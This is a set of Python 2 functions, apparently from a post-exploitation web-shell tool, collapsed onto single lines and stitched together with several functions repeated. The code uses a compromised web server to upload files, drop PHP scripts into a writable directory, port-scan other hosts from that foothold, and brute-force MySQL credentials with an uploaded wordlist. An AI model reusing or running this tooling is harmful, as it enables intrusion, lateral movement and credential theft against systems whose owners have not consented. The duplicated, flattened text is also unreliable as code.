def upload(self, command): if len(command) != 3: cprint('\n[!] Usage: @upload [local_file_path] [remote_file_path]', 'red') else: lfile_path = command[1] rfile_path = command[2] file_handler.upload_file(lfile_path, rfile_path)
def __init__(self, host, username, password): cprint("\n[+] Please type 'exit' when your done to remove the files uploaded on the server") self.host = host self.username = username self.password = password self.hostDir = linux.get_writble_dir() if not self.hostDir: cprint("'\n[+] Unable to locate a writeble directory on the server") cprint("\n[+]MySQL module can't be used. Exiting now!") else: self.phpFile = [self.hostDir + "/mysql.php", self.hostDir + "/auth.php"] cprint('\n[+] Uploading PHP files...', 'green') for i in self.phpFile: file_handler.upload_file('modules/services/{0}'.format(i.split('/')[-1]), i) cmd = 'echo "%s,%s,%s" > %s/auth.txt' % (self.username, self.password, self.host, self.hostDir) cprint('\n[+] Authenticating with the server...', 'blue') make_request.get_page_source(cmd) cmd = "cd {0}; php {1}".format(self.hostDir, 'auth.php') res = make_request.get_page_source(cmd) if 'failure' in res: cprint("\n[+] Access denied for user '{0}'@'{1}'".format(self.username, self.host), 'red') self.authorized = False self.clean() else: cprint("\n[+]Login Successful", 'green') self.authorized = True
def scan_host(self, host, range): folder = linux.get_writble_dir() if folder: cprint('[+] Uploading scanner to the box ...', 'green') scanner = folder + '/webhandler_scanner.php' file_handler.upload_file('modules/scanners/port.php', scanner) cmd = 'cd {0}; php {1} {2} {3}'.format(folder, scanner, host, range) cprint('\n[+] Scanning the target ...', 'green') cprint('----------------------------') try: output = make_request.get_page_source(cmd) if output: print "" for line in output: cprint(line, 'white') else: cprint('\n[+] Didn\'t find any open ports match the range "{0}"'.format(range), 'red') file_handler.clean(scanner) except KeyboardInterrupt: file_handler.clean(scanner)
def mysql(self): folder = linux.get_writble_dir() if folder: self.bruter_file = folder + "/mysql.php" self.wordlist = folder + "/wordlist.txt" cprint("\n[+] Uploading the bruter/wordlist ...", "green") file_handler.upload_file("modules/bruters/mysql_bruter.php", self.bruter_file) file_handler.upload_file("modules/bruters/wordlist.txt", self.wordlist) cmd = "cd {0}; php {1}".format(folder, self.bruter_file) cprint("\n[+] Brute-Forcing MySql Creds ...", "green") try: creds = make_request.get_page_source(cmd) creds = "".join(creds).split(":") if creds[0] == "success": username = colored(creds[1], "blue") password = colored(creds[2], "blue") print "[+] MySql Creds Username: {0} Password: {1}".format(username, password) else: cprint("[!] Couldn't brute-force MySql credentials", "red") self.clean() except KeyboardInterrupt: self.clean()
def mysql(self): folder = linux.get_writble_dir() if folder: self.bruter_file = folder + '/mysql.php' self.wordlist = folder + '/wordlist.txt' cprint('\n[+] Uploading the bruter/wordlist ...', 'green') file_handler.upload_file('modules/bruters/mysql_bruter.php', self.bruter_file) file_handler.upload_file('modules/bruters/wordlist.txt', self.wordlist) cmd = 'cd {0}; php {1}'.format(folder, self.bruter_file) cprint('\n[+] Brute-Forcing MySql Creds ...', 'green') try: creds = make_request.get_page_source(cmd) creds = ''.join(creds).split(':') if creds[0] == 'success': username = colored(creds[1], 'blue') password = colored(creds[2], 'blue') print '[+] MySql Creds Username: {0} Password: {1}'.format(username, password) else: cprint('[!] Couldn\'t brute-force MySql credentials', 'red') self.clean() except KeyboardInterrupt: self.clean()
def __init__(self, host, username, password): cprint( "\n[+] Please type 'exit' when your done to remove the files uploaded on the server" ) self.host = host self.username = username self.password = password self.hostDir = linux.get_writble_dir() if not self.hostDir: cprint( "'\n[+] Unable to locate a writeble directory on the server") cprint("\n[+]MySQL module can't be used. Exiting now!") else: self.phpFile = [ self.hostDir + "/mysql.php", self.hostDir + "/auth.php" ] cprint('\n[+] Uploading PHP files...', 'green') for i in self.phpFile: file_handler.upload_file( 'modules/services/{0}'.format(i.split('/')[-1]), i) cmd = 'echo "%s,%s,%s" > %s/auth.txt' % ( self.username, self.password, self.host, self.hostDir) cprint('\n[+] Authenticating with the server...', 'blue') make_request.get_page_source(cmd) cmd = "cd {0}; php {1}".format(self.hostDir, 'auth.php') res = make_request.get_page_source(cmd) if 'failure' in res: cprint( "\n[+] Access denied for user '{0}'@'{1}'".format( self.username, self.host), 'red') self.authorized = False self.clean() else: cprint("\n[+]Login Successful", 'green') self.authorized = True
def scan_host(self, host, range): folder = linux.get_writble_dir() if folder: cprint('[+] Uploading scanner to the box ...', 'green') scanner = folder + '/webhandler_scanner.php' file_handler.upload_file('modules/scanners/port.php', scanner) cmd = 'cd {0}; php {1} {2} {3}'.format(folder, scanner, host, range) cprint('\n[+] Scanning the target ...', 'green') cprint('----------------------------') try: output = make_request.get_page_source(cmd) if output: print "" for line in output: cprint(line, 'white') else: cprint( '\n[+] Didn\'t find any open ports match the range "{0}"' .format(range), 'red') file_handler.clean(scanner) except KeyboardInterrupt: file_handler.clean(scanner)